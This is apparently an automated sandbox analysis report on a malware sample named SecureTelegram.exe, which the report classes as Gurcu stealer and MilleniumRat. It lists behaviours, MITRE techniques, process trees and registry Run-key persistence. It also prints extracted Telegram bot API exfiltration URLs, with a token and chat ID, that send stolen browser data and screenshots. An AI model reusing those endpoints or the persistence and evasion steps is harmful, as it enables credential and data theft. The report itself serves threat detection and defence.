gurcu | 3134316cd5f860361755f9370505e440ee9fd91a2e15ae8c27bf5aceafb70030

Analysis

max time kernel
30s
max time network
40s
platform
windows10-2004_x64
resource
win10v2004-20240704-en
resource tags

arch:x64arch:x86image:win10v2004-20240704-enlocale:en-usos:windows10-2004-x64system
submitted
06-07-2024 00:16

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

SecureTelegram.exe
Size

37.0MB
MD5

704c4cb99b74b3bf258a99ebe601a9b1
SHA1

ab66a01cb4f912e76ed4af4aa999d80fb63edf83
SHA256

3134316cd5f860361755f9370505e440ee9fd91a2e15ae8c27bf5aceafb70030
SHA512

442c596beb5035c4fad8ef141e889c9d286d93694877a2a82b3081322de04b32c7fade62f7743c7a8852df0a2f3707a075b5ad1bee083a5714d8056ecf3c9259
SSDEEP

786432:qRQBrRSY+R46huYqwAO4YoMGD6Oaf3ooHLl0UAlYBLe+9qz7fEg:qROrRR+R4WurwAO49QvocBAlYBLe+G7R

Score

10^/10

gurcu milleniumrat evasion execution persistence privilege_escalation pyinstaller rat spyware stealer upx

Malware Config

Extracted

Family

gurcu

https://api.telegram.org/bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/sendDocument?chat_id=-1002245526003&caption=%F0%9F%93%82%20-%20Browser%20data%0A%E2%94%9C%E2%94%80%E2%94%80%20%F0%9F%93%82%20-%20cookies(0%20kb

https://api.telegram.org/bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/sendMessage?chat_id=-1002245526003

https://api.telegram.org/bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-

https://api.telegram.org/bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/sendDocument?chat_id=-1002245526003&caption=%F0%9F%93%B8Screenshot%20take

Signatures

Gurcu, WhiteSnake
Gurcu is a malware stealer written in C#.
stealer gurcu
MilleniumRat
MilleniumRat is a remote access trojan written in C#.
rat stealer milleniumrat

Suspicious use of NtCreateUserProcessOtherParentProcess 6 IoCs

Processes:

setup.exe

description	pid	process	target process
PID 2912 created 3556	2912	setup.exe	Explorer.EXE
PID 2912 created 3556	2912	setup.exe	Explorer.EXE
PID 2912 created 3556	2912	setup.exe	Explorer.EXE
PID 2912 created 3556	2912	setup.exe	Explorer.EXE
PID 2912 created 3556	2912	setup.exe	Explorer.EXE
PID 2912 created 3556	2912	setup.exe	Explorer.EXE

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Using powershell.exe command.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exe

pid process

7096 powershell.exe
4676 powershell.exe
6348 powershell.exe
1824 powershell.exe
Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

pid	process
7096	powershell.exe
4676	powershell.exe
6348	powershell.exe
1824	powershell.exe

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

wmiprvse.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	wmiprvse.exe

Checks computer location settings 2 TTPs 4 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

main.exeUpdate.exeBuild.exes.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Control Panel\International\Geo\Nation	main.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Control Panel\International\Geo\Nation	Update.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Control Panel\International\Geo\Nation	Build.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Control Panel\International\Geo\Nation	s.exe

Executes dropped EXE 13 IoCs

Processes:

Build.exehacn.exehacn.exes.exebased.exebased.exemain.exesvchost.exesetup.exesvchost.exerar.exeUpdate.exeupdater.exe

pid	process
4952	Build.exe
1896	hacn.exe
1028	hacn.exe
4176	s.exe
3272	based.exe
880	based.exe
3364	main.exe
2408	svchost.exe
2912	setup.exe
4204	svchost.exe
5956	rar.exe
5700	Update.exe
392	updater.exe

Loads dropped DLL 48 IoCs

Processes:

SecureTelegram.exehacn.exebased.exemain.exesvchost.exeUpdate.exe

pid	process
4548	SecureTelegram.exe
4548	SecureTelegram.exe
1028	hacn.exe
1028	hacn.exe
880	based.exe
880	based.exe
880	based.exe
880	based.exe
880	based.exe
3364	main.exe
880	based.exe
880	based.exe
880	based.exe
880	based.exe
880	based.exe
880	based.exe
880	based.exe
880	based.exe
880	based.exe
4204	svchost.exe
4204	svchost.exe
4204	svchost.exe
4204	svchost.exe
4204	svchost.exe
4204	svchost.exe
4204	svchost.exe
4204	svchost.exe
4204	svchost.exe
4204	svchost.exe
4204	svchost.exe
4204	svchost.exe
4204	svchost.exe
4204	svchost.exe
4204	svchost.exe
4204	svchost.exe
4204	svchost.exe
4204	svchost.exe
880	based.exe
880	based.exe
4204	svchost.exe
4204	svchost.exe
4204	svchost.exe
4204	svchost.exe
4204	svchost.exe
4204	svchost.exe
4204	svchost.exe
4204	svchost.exe
5700	Update.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

UPX packed file 49 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\_MEI13962\python312.dll	upx
behavioral2/memory/4548-16-0x00007FFEF70E0000-0x00007FFEF77B0000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\_MEI13962\_socket.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI13962\_lzma.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI13962\_hashlib.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI13962\_decimal.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI13962\_bz2.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI13962\unicodedata.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI13962\select.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI13962\libcrypto-3.dll	upx
behavioral2/memory/880-104-0x00007FFEF70E0000-0x00007FFEF77B0000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\_MEI32722\_ctypes.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI32722\libffi-8.dll	upx
C:\Users\Admin\AppData\Local\Temp\_MEI32722\_ssl.pyd	upx
behavioral2/memory/880-128-0x00007FFF0EA50000-0x00007FFF0EA5F000-memory.dmp	upx
behavioral2/memory/880-127-0x00007FFF0C390000-0x00007FFF0C3B5000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\_MEI32722\_sqlite3.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI32722\_queue.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI32722\sqlite3.dll	upx
C:\Users\Admin\AppData\Local\Temp\_MEI32722\libssl-3.dll	upx
behavioral2/memory/880-223-0x00007FFF06DE0000-0x00007FFF06E0D000-memory.dmp	upx
behavioral2/memory/880-225-0x00007FFF069E0000-0x00007FFF069F5000-memory.dmp	upx
behavioral2/memory/880-226-0x00007FFEF25D0000-0x00007FFEF2AF2000-memory.dmp	upx
behavioral2/memory/880-228-0x00007FFF067A0000-0x00007FFF067B9000-memory.dmp	upx
behavioral2/memory/880-230-0x00007FFEF2450000-0x00007FFEF25C7000-memory.dmp	upx
behavioral2/memory/880-244-0x00007FFEF2380000-0x00007FFEF244D000-memory.dmp	upx
behavioral2/memory/880-243-0x00007FFF05FE0000-0x00007FFF06013000-memory.dmp	upx
behavioral2/memory/880-242-0x00007FFF0EA40000-0x00007FFF0EA4D000-memory.dmp	upx
behavioral2/memory/880-241-0x00007FFF06750000-0x00007FFF06769000-memory.dmp	upx
behavioral2/memory/880-229-0x00007FFF06770000-0x00007FFF06794000-memory.dmp	upx
behavioral2/memory/880-836-0x00007FFF06740000-0x00007FFF0674D000-memory.dmp	upx
behavioral2/memory/880-1004-0x00007FFEF18F0000-0x00007FFEF1A0B000-memory.dmp	upx
behavioral2/memory/880-1878-0x00007FFEF70E0000-0x00007FFEF77B0000-memory.dmp	upx
behavioral2/memory/880-1954-0x00007FFF0C390000-0x00007FFF0C3B5000-memory.dmp	upx
behavioral2/memory/880-2353-0x00007FFF069E0000-0x00007FFF069F5000-memory.dmp	upx
behavioral2/memory/880-2362-0x00007FFF06740000-0x00007FFF0674D000-memory.dmp	upx
behavioral2/memory/880-2363-0x00007FFEF18F0000-0x00007FFEF1A0B000-memory.dmp	upx
behavioral2/memory/880-2361-0x00007FFEF2380000-0x00007FFEF244D000-memory.dmp	upx
behavioral2/memory/880-2360-0x00007FFF05FE0000-0x00007FFF06013000-memory.dmp	upx
behavioral2/memory/880-2359-0x00007FFF0EA40000-0x00007FFF0EA4D000-memory.dmp	upx
behavioral2/memory/880-2358-0x00007FFF06750000-0x00007FFF06769000-memory.dmp	upx
behavioral2/memory/880-2357-0x00007FFEF2450000-0x00007FFEF25C7000-memory.dmp	upx
behavioral2/memory/880-2356-0x00007FFF06770000-0x00007FFF06794000-memory.dmp	upx
behavioral2/memory/880-2355-0x00007FFF067A0000-0x00007FFF067B9000-memory.dmp	upx
behavioral2/memory/880-2354-0x00007FFEF25D0000-0x00007FFEF2AF2000-memory.dmp	upx
behavioral2/memory/880-2352-0x00007FFF06DE0000-0x00007FFF06E0D000-memory.dmp	upx
behavioral2/memory/880-2351-0x00007FFF0EA50000-0x00007FFF0EA5F000-memory.dmp	upx
behavioral2/memory/880-2350-0x00007FFF0C390000-0x00007FFF0C3B5000-memory.dmp	upx
behavioral2/memory/880-2349-0x00007FFEF70E0000-0x00007FFEF77B0000-memory.dmp	upx

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

svchost.exereg.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\кокершмидт = "C:\\ProgramData\\svchost.exe"	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ChromeUpdate = "C:\\Users\\Admin\\AppData\\Roaming\\GoogleChromeUpdateLog\\Update.exe"	reg.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs

Web Service
T1102

Processes:

flow ioc

101 discord.com
21 raw.githubusercontent.com
22 raw.githubusercontent.com
25 raw.githubusercontent.com
78 raw.githubusercontent.com
100 discord.com
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

15 ip-api.com
31 api.ipify.org
32 api.ipify.org

flow	ioc
101	discord.com
21	raw.githubusercontent.com
22	raw.githubusercontent.com
25	raw.githubusercontent.com
78	raw.githubusercontent.com
100	discord.com

flow	ioc
15	ip-api.com
31	api.ipify.org
32	api.ipify.org

Drops file in System32 directory 1 IoCs

Processes:

svchost.exe

description	ioc	process
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157	svchost.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

Processes:

svchost.exe

pid process

4204 svchost.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

setup.exe

description pid process target process

PID 2912 set thread context of 2712 2912 setup.exe dialer.exe
Drops file in Program Files directory 1 IoCs

Processes:

setup.exe

description ioc process

File created C:\Program Files\Google\Chrome\updater.exe setup.exe
Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exe

pid process

7140 sc.exe
7164 sc.exe
1788 sc.exe
5776 sc.exe
5020 sc.exe

pid	process
4204	svchost.exe

description	pid	process	target process
PID 2912 set thread context of 2712	2912	setup.exe	dialer.exe

description	ioc	process
File created	C:\Program Files\Google\Chrome\updater.exe	setup.exe

pid	process
7140	sc.exe
7164	sc.exe
1788	sc.exe
5776	sc.exe
5020	sc.exe

Detects Pyinstaller 2 IoCs

pyinstaller

Processes:

resource	yara_rule
C:\ProgramData\Microsoft\hacn.exe	pyinstaller
C:\ProgramData\svchost.exe	pyinstaller

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

Processes:

netsh.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

Update.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	Update.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0	Update.exe

Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

5568 timeout.exe
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.

System Information Discovery
T1082

Processes:

WMIC.exe

pid process

6428 WMIC.exe
Enumerates processes with tasklist 1 TTPs 4 IoCs

Process Discovery
T1057

Processes:

tasklist.exetasklist.exetasklist.exetasklist.exe

pid process

5908 tasklist.exe
6520 tasklist.exe
5520 tasklist.exe
3320 tasklist.exe
Enumerates system info in registry 2 TTPs 1 IoCs

Query Registry
T1012

System Information Discovery
T1082

Processes:

wmiprvse.exe

description ioc process

Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier wmiprvse.exe
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.

System Information Discovery
T1082

Processes:

systeminfo.exe

pid process

7060 systeminfo.exe
Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

2124 reg.exe
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence execution

Scheduled Task
T1053.005

Processes:

schtasks.exe

pid process

516 schtasks.exe

pid	process
5568	timeout.exe

pid	process
6428	WMIC.exe

pid	process
5908	tasklist.exe
6520	tasklist.exe
5520	tasklist.exe
3320	tasklist.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	wmiprvse.exe

pid	process
7060	systeminfo.exe

pid	process
2124	reg.exe

pid	process
516	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exemain.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeUpdate.exe

pid	process
5756	powershell.exe
5756	powershell.exe
3364	main.exe
3364	main.exe
3364	main.exe
3364	main.exe
3364	main.exe
3364	main.exe
3364	main.exe
3364	main.exe
3364	main.exe
3364	main.exe
3364	main.exe
3364	main.exe
3364	main.exe
3364	main.exe
3364	main.exe
3364	main.exe
3364	main.exe
3364	main.exe
4676	powershell.exe
4676	powershell.exe
3364	main.exe
3364	main.exe
3364	main.exe
3364	main.exe
5756	powershell.exe
5756	powershell.exe
6404	powershell.exe
6404	powershell.exe
6348	powershell.exe
6348	powershell.exe
4676	powershell.exe
4676	powershell.exe
7096	powershell.exe
7096	powershell.exe
6404	powershell.exe
7096	powershell.exe
6348	powershell.exe
1488	powershell.exe
1488	powershell.exe
1488	powershell.exe
5232	powershell.exe
5232	powershell.exe
5232	powershell.exe
5700	Update.exe
5700	Update.exe
5700	Update.exe
5700	Update.exe
5700	Update.exe
5700	Update.exe
5700	Update.exe
5700	Update.exe
5700	Update.exe
5700	Update.exe
5700	Update.exe
5700	Update.exe
5700	Update.exe
5700	Update.exe
5700	Update.exe
5700	Update.exe
5700	Update.exe
5700	Update.exe
5700	Update.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

main.exetasklist.exepowershell.exetasklist.exepowershell.exeWMIC.exepowershell.exepowershell.exetasklist.exepowershell.exepowershell.exepowershell.exetasklist.exeUpdate.exeWMIC.exe

description	pid	process
Token: SeDebugPrivilege	3364	main.exe
Token: SeDebugPrivilege	3320	tasklist.exe
Token: SeDebugPrivilege	5756	powershell.exe
Token: SeDebugPrivilege	5908	tasklist.exe
Token: SeDebugPrivilege	4676	powershell.exe
Token: SeIncreaseQuotaPrivilege	6388	WMIC.exe
Token: SeSecurityPrivilege	6388	WMIC.exe
Token: SeTakeOwnershipPrivilege	6388	WMIC.exe
Token: SeLoadDriverPrivilege	6388	WMIC.exe
Token: SeSystemProfilePrivilege	6388	WMIC.exe
Token: SeSystemtimePrivilege	6388	WMIC.exe
Token: SeProfSingleProcessPrivilege	6388	WMIC.exe
Token: SeIncBasePriorityPrivilege	6388	WMIC.exe
Token: SeCreatePagefilePrivilege	6388	WMIC.exe
Token: SeBackupPrivilege	6388	WMIC.exe
Token: SeRestorePrivilege	6388	WMIC.exe
Token: SeShutdownPrivilege	6388	WMIC.exe
Token: SeDebugPrivilege	6388	WMIC.exe
Token: SeSystemEnvironmentPrivilege	6388	WMIC.exe
Token: SeRemoteShutdownPrivilege	6388	WMIC.exe
Token: SeUndockPrivilege	6388	WMIC.exe
Token: SeManageVolumePrivilege	6388	WMIC.exe
Token: 33	6388	WMIC.exe
Token: 34	6388	WMIC.exe
Token: 35	6388	WMIC.exe
Token: 36	6388	WMIC.exe
Token: SeDebugPrivilege	6404	powershell.exe
Token: SeDebugPrivilege	6348	powershell.exe
Token: SeDebugPrivilege	6520	tasklist.exe
Token: SeIncreaseQuotaPrivilege	6388	WMIC.exe
Token: SeSecurityPrivilege	6388	WMIC.exe
Token: SeTakeOwnershipPrivilege	6388	WMIC.exe
Token: SeLoadDriverPrivilege	6388	WMIC.exe
Token: SeSystemProfilePrivilege	6388	WMIC.exe
Token: SeSystemtimePrivilege	6388	WMIC.exe
Token: SeProfSingleProcessPrivilege	6388	WMIC.exe
Token: SeIncBasePriorityPrivilege	6388	WMIC.exe
Token: SeCreatePagefilePrivilege	6388	WMIC.exe
Token: SeBackupPrivilege	6388	WMIC.exe
Token: SeRestorePrivilege	6388	WMIC.exe
Token: SeShutdownPrivilege	6388	WMIC.exe
Token: SeDebugPrivilege	6388	WMIC.exe
Token: SeSystemEnvironmentPrivilege	6388	WMIC.exe
Token: SeRemoteShutdownPrivilege	6388	WMIC.exe
Token: SeUndockPrivilege	6388	WMIC.exe
Token: SeManageVolumePrivilege	6388	WMIC.exe
Token: 33	6388	WMIC.exe
Token: 34	6388	WMIC.exe
Token: 35	6388	WMIC.exe
Token: 36	6388	WMIC.exe
Token: SeDebugPrivilege	7096	powershell.exe
Token: SeDebugPrivilege	1488	powershell.exe
Token: SeDebugPrivilege	5232	powershell.exe
Token: SeDebugPrivilege	5520	tasklist.exe
Token: SeDebugPrivilege	5700	Update.exe
Token: SeIncreaseQuotaPrivilege	6084	WMIC.exe
Token: SeSecurityPrivilege	6084	WMIC.exe
Token: SeTakeOwnershipPrivilege	6084	WMIC.exe
Token: SeLoadDriverPrivilege	6084	WMIC.exe
Token: SeSystemProfilePrivilege	6084	WMIC.exe
Token: SeSystemtimePrivilege	6084	WMIC.exe
Token: SeProfSingleProcessPrivilege	6084	WMIC.exe
Token: SeIncBasePriorityPrivilege	6084	WMIC.exe
Token: SeCreatePagefilePrivilege	6084	WMIC.exe

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

Update.exe

pid process

5700 Update.exe

pid	process
5700	Update.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

SecureTelegram.exeSecureTelegram.execmd.exeBuild.exehacn.exehacn.execmd.exebased.exes.exesvchost.exesvchost.exebased.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exe

description	pid	process	target process
PID 1396 wrote to memory of 4548	1396	SecureTelegram.exe	SecureTelegram.exe
PID 1396 wrote to memory of 4548	1396	SecureTelegram.exe	SecureTelegram.exe
PID 4548 wrote to memory of 2216	4548	SecureTelegram.exe	cmd.exe
PID 4548 wrote to memory of 2216	4548	SecureTelegram.exe	cmd.exe
PID 2216 wrote to memory of 4952	2216	cmd.exe	Build.exe
PID 2216 wrote to memory of 4952	2216	cmd.exe	Build.exe
PID 2216 wrote to memory of 4952	2216	cmd.exe	Build.exe
PID 4952 wrote to memory of 1896	4952	Build.exe	hacn.exe
PID 4952 wrote to memory of 1896	4952	Build.exe	hacn.exe
PID 1896 wrote to memory of 1028	1896	hacn.exe	hacn.exe
PID 1896 wrote to memory of 1028	1896	hacn.exe	hacn.exe
PID 1028 wrote to memory of 4324	1028	hacn.exe	cmd.exe
PID 1028 wrote to memory of 4324	1028	hacn.exe	cmd.exe
PID 4324 wrote to memory of 4176	4324	cmd.exe	s.exe
PID 4324 wrote to memory of 4176	4324	cmd.exe	s.exe
PID 4324 wrote to memory of 4176	4324	cmd.exe	s.exe
PID 4952 wrote to memory of 3272	4952	Build.exe	based.exe
PID 4952 wrote to memory of 3272	4952	Build.exe	based.exe
PID 3272 wrote to memory of 880	3272	based.exe	based.exe
PID 3272 wrote to memory of 880	3272	based.exe	based.exe
PID 4176 wrote to memory of 3364	4176	s.exe	main.exe
PID 4176 wrote to memory of 3364	4176	s.exe	main.exe
PID 4176 wrote to memory of 2408	4176	s.exe	svchost.exe
PID 4176 wrote to memory of 2408	4176	s.exe	svchost.exe
PID 4176 wrote to memory of 2912	4176	s.exe	setup.exe
PID 4176 wrote to memory of 2912	4176	s.exe	setup.exe
PID 2408 wrote to memory of 4204	2408	svchost.exe	svchost.exe
PID 2408 wrote to memory of 4204	2408	svchost.exe	svchost.exe
PID 4204 wrote to memory of 4680	4204	svchost.exe	cmd.exe
PID 4204 wrote to memory of 4680	4204	svchost.exe	cmd.exe
PID 880 wrote to memory of 2556	880	based.exe	cmd.exe
PID 880 wrote to memory of 2556	880	based.exe	cmd.exe
PID 880 wrote to memory of 1560	880	based.exe	cmd.exe
PID 880 wrote to memory of 1560	880	based.exe	cmd.exe
PID 880 wrote to memory of 4504	880	based.exe	cmd.exe
PID 880 wrote to memory of 4504	880	based.exe	cmd.exe
PID 880 wrote to memory of 5888	880	based.exe	cmd.exe
PID 880 wrote to memory of 5888	880	based.exe	cmd.exe
PID 880 wrote to memory of 5632	880	based.exe	cmd.exe
PID 880 wrote to memory of 5632	880	based.exe	cmd.exe
PID 1560 wrote to memory of 5756	1560	cmd.exe	powershell.exe
PID 1560 wrote to memory of 5756	1560	cmd.exe	powershell.exe
PID 880 wrote to memory of 5776	880	based.exe	cmd.exe
PID 880 wrote to memory of 5776	880	based.exe	cmd.exe
PID 5632 wrote to memory of 3320	5632	cmd.exe	tasklist.exe
PID 5632 wrote to memory of 3320	5632	cmd.exe	tasklist.exe
PID 5776 wrote to memory of 5908	5776	cmd.exe	tasklist.exe
PID 5776 wrote to memory of 5908	5776	cmd.exe	tasklist.exe
PID 880 wrote to memory of 5864	880	based.exe	cmd.exe
PID 880 wrote to memory of 5864	880	based.exe	cmd.exe
PID 2556 wrote to memory of 4676	2556	cmd.exe	powershell.exe
PID 2556 wrote to memory of 4676	2556	cmd.exe	powershell.exe
PID 4504 wrote to memory of 3032	4504	cmd.exe	mshta.exe
PID 4504 wrote to memory of 3032	4504	cmd.exe	mshta.exe
PID 880 wrote to memory of 6196	880	based.exe	cmd.exe
PID 880 wrote to memory of 6196	880	based.exe	cmd.exe
PID 880 wrote to memory of 6216	880	based.exe	cmd.exe
PID 880 wrote to memory of 6216	880	based.exe	cmd.exe
PID 5888 wrote to memory of 6348	5888	cmd.exe	powershell.exe
PID 5888 wrote to memory of 6348	5888	cmd.exe	powershell.exe
PID 880 wrote to memory of 6364	880	based.exe	cmd.exe
PID 880 wrote to memory of 6364	880	based.exe	cmd.exe
PID 5864 wrote to memory of 6388	5864	cmd.exe	WMIC.exe
PID 5864 wrote to memory of 6388	5864	cmd.exe	WMIC.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:616
- C:\Windows\system32\dwm.exe
  "dwm.exe"
  2⤵
  PID:64

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:672

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:948

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:512

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:856

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
PID:1108
- C:\Windows\system32\taskhostw.exe
  taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
  2⤵
  PID:2776
- C:\Program Files\Google\Chrome\updater.exe
  "C:\Program Files\Google\Chrome\updater.exe"
  2⤵
  - Executes dropped EXE
  PID:392

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
PID:1116

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:1172

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:1180

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1264

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1272

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1280

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1408

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1448
- C:\Windows\system32\sihost.exe
  sihost.exe
  2⤵
  PID:2644

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1588

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1596

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
1⤵
PID:1640

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1720

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1752

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
1⤵
PID:1764

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1856

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
1⤵
PID:1960

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1980

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:2008

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:1000

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
PID:2068

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:2100

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
PID:2196

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2340

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2496

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2504

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:2656

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
1⤵
- Drops file in System32 directory
PID:2760

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
1⤵
PID:2788

C:\Windows\system32\svchost.exe
